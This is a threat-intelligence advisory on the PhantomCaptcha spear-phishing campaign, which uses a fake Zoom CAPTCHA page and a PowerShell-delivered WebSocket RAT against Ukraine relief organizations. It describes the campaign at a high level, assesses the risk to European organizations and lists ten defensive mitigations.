PhantomCaptcha is a spear-phishing campaign disclosed in October 2025 that targets organizations involved in Ukraine's war relief efforts, including the International Red Cross, Norwegian Refugee Council, UNICEF Ukraine, and regional Ukrainian governments. The attack begins with phishing emails impersonating the Ukrainian President's Office, delivering weaponized PDFs containing embedded links. When victims click these links, they are redirected to a fake Zoom website (zoomconference[.]app) that simulates a Cloudflare CAPTCHA page to trick users into running a malicious PowerShell command. This command downloads an obfuscated downloader that fetches a second-stage payload performing host reconnaissance and then installs a WebSocket-based remote access trojan (RAT). The RAT connects to a command-and-control server hosted on Russian infrastructure, communicating via WebSocket with Base64-encoded JSON messages to execute arbitrary PowerShell commands and exfiltrate data. The campaign infrastructure was registered months in advance, with domains used briefly to evade detection. Additionally, fake Android applications hosted on other domains were used to collect extensive device data. The campaign demonstrates advanced operational security, compartmentalized infrastructure, and sophisticated social engineering tactics. While no direct attribution is confirmed, similarities with Russia-linked COLDRIVER group tactics are noted. The campaign’s targeting of humanitarian and government entities involved in Ukraine relief efforts highlights its strategic intent and potential geopolitical motivations.

European organizations involved in humanitarian aid, government administration, and international relief efforts related to Ukraine face significant risks from this campaign. Compromise of such entities could lead to unauthorized access to sensitive personal data, operational disruption, and leakage of strategic information related to Ukraine’s war relief activities. The RAT’s capabilities allow attackers to execute arbitrary commands, exfiltrate data, and deploy further malware, potentially undermining organizational integrity and availability of critical services. The use of fake Zoom meetings exploits trust in widely used collaboration tools, increasing the likelihood of successful social engineering. Additionally, the campaign’s targeting of Android devices could expose European aid workers’ mobile data, including location and communications, further endangering operational security. The medium severity rating reflects the targeted nature and complexity of the attack, but the potential for significant impact on confidentiality, integrity, and availability of critical humanitarian operations is high. European organizations supporting Ukraine must be vigilant against such sophisticated threats that blend social engineering with advanced malware delivery.

1. Implement strict email filtering and phishing detection mechanisms focused on spear-phishing indicators, including domain impersonation and weaponized PDF attachments. 2. Conduct targeted user awareness training emphasizing the risks of executing commands from unsolicited documents and verifying meeting invitations, especially those purporting to be from high-profile government offices. 3. Enforce application whitelisting and restrict execution of PowerShell scripts unless explicitly approved and monitored. 4. Deploy endpoint detection and response (EDR) solutions capable of detecting obfuscated PowerShell activity and anomalous WebSocket communications. 5. Monitor network traffic for unusual WebSocket connections to suspicious domains, particularly those with short-lived or newly registered infrastructure. 6. Validate Zoom meeting invitations through official channels and discourage users from clicking links in unsolicited emails. 7. For mobile devices, enforce mobile device management (MDM) policies to prevent installation of unauthorized applications and monitor for suspicious app behavior. 8. Maintain up-to-date threat intelligence feeds to detect emerging indicators related to this campaign. 9. Coordinate with national cybersecurity centers and international partners to share intelligence and respond to incidents rapidly. 10. Conduct regular incident response exercises simulating social engineering attacks involving collaboration tools to improve organizational readiness.